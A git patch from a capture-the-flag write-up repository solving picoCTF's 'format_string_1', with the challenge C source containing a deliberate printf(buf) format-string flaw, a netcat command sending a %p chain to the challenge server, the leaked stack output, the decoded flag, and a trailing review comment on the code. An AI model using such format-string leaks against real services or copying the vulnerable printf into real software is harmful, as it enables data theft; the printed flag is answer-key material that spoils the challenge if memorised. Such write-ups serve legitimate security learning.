From 9300e7c5f3547fd1dbb2431c37c53713c7dbcd4c Mon Sep 17 00:00:00 2001
From: h7x4
Date: Tue, 3 Sep 2024 20:24:05 +0200
Subject: [PATCH] pwn/format_string_1
---
pwn/format_string_1/flag.txt | 5 +++
pwn/format_string_1/format-string-1 | Bin 0 -> 16256 bytes
pwn/format_string_1/format-string-1.c | 44 ++++++++++++++++++++++++++
pwn/format_string_1/output.txt | 4 +++
4 files changed, 53 insertions(+)
create mode 100644 pwn/format_string_1/flag.txt
create mode 100755 pwn/format_string_1/format-string-1
create mode 100644 pwn/format_string_1/format-string-1.c
create mode 100644 pwn/format_string_1/output.txt
diff --git a/pwn/format_string_1/flag.txt b/pwn/format_string_1/flag.txt
new file mode 100644
index 0000000..c3023f7
--- /dev/null
+++ b/pwn/format_string_1/flag.txt
@@ -0,0 +1,5 @@
+# By cutting off a part of the output and giving it to cyberchef (as well as swapping endianness with word length 8), we get:
+
+0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+
+-> picoCTF{4n1m41_57y13_4x4_f14g_65590d41}
diff --git a/pwn/format_string_1/format-string-1 b/pwn/format_string_1/format-string-1 new file mode 100755 index 0000000000000000000000000000000000000000..25e6624576ee746cf85367ecb77de7080d62740c GIT binary patch literal 16256 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 Sh@K0o*cccX + + +int main() { + char buf[1024]; + char secret1[64]; + char flag[64]; + char secret2[64]; + + // Read in first secret menu item + FILE *fd = fopen("secret-menu-item-1.txt", "r"); + if (fd == NULL){ + printf("'secret-menu-item-1.txt' file not found, aborting.\n"); + return 1; + } + fgets(secret1, 64, fd); + // Read in the flag + fd = fopen("flag.txt", "r"); + if (fd == NULL){ + printf("'flag.txt' file not found, aborting.\n"); + return 1; + } + fgets(flag, 64, fd); + // Read in second secret menu item + fd = fopen("secret-menu-item-2.txt", "r"); + if (fd == NULL){ + printf("'secret-menu-item-2.txt' file not found, aborting.\n"); + 
return 1;
+ }
+ fgets(secret2, 64, fd);
+
+ printf("Give me your order and I'll read it back to you:\n");
+ fflush(stdout);
+ scanf("%1024s", buf);
+ printf("Here's your order: ");
+ printf(buf);
+ printf("\n");
+ fflush(stdout);
+
+ printf("Bye!\n");
+ fflush(stdout);
+
+ return 0;
+}
diff --git a/pwn/format_string_1/output.txt b/pwn/format_string_1/output.txt
new file mode 100644
index 0000000..2041e96
--- /dev/null
+++ b/pwn/format_string_1/output.txt
@@ -0,0 +1,4 @@
+$ nc mimas.picoctf.net 57678 <<<"%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p.%p"
+Give me your order and I'll read it back to you:
+Here's your order: 0x402118.(nil).0x7fbbf8d1fa00.(nil).0x89b880.0xa347834.0x7ffd876bd5a0.0x7fbbf8b10e60.0x7fbbf8d354d0.0x1.0x7ffd876bd670.(nil).(nil).0x7b4654436f636970.0x355f31346d316e34.0x3478345f33317937.0x35365f673431665f.0x7d313464303935
+Bye!
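Review bot: In pwn/format_string_1/format-string-1.c, `scanf("%1024s", buf)` can store 1024 characters plus the terminating NUL into `char buf[1024]`, a one-byte overflow that is separate from the bug the exercise is about; the width should be `%1023s`. The `printf(buf)` call two lines later passes the user's input as the format string, which appears to be the deliberate flaw and is why the `%p` chain in output.txt prints the stack words holding `flag`; a comment such as `/* intentional format-string bug for the exercise; real code uses printf("%s", buf) */` would keep the line from being copied as-is. Each `fopen` result is overwritten without an `fclose`, and the `fgets` return values are unchecked, so an empty input file leaves the corresponding buffer uninitialised. The hunk's header and `#include` lines are not visible on this page.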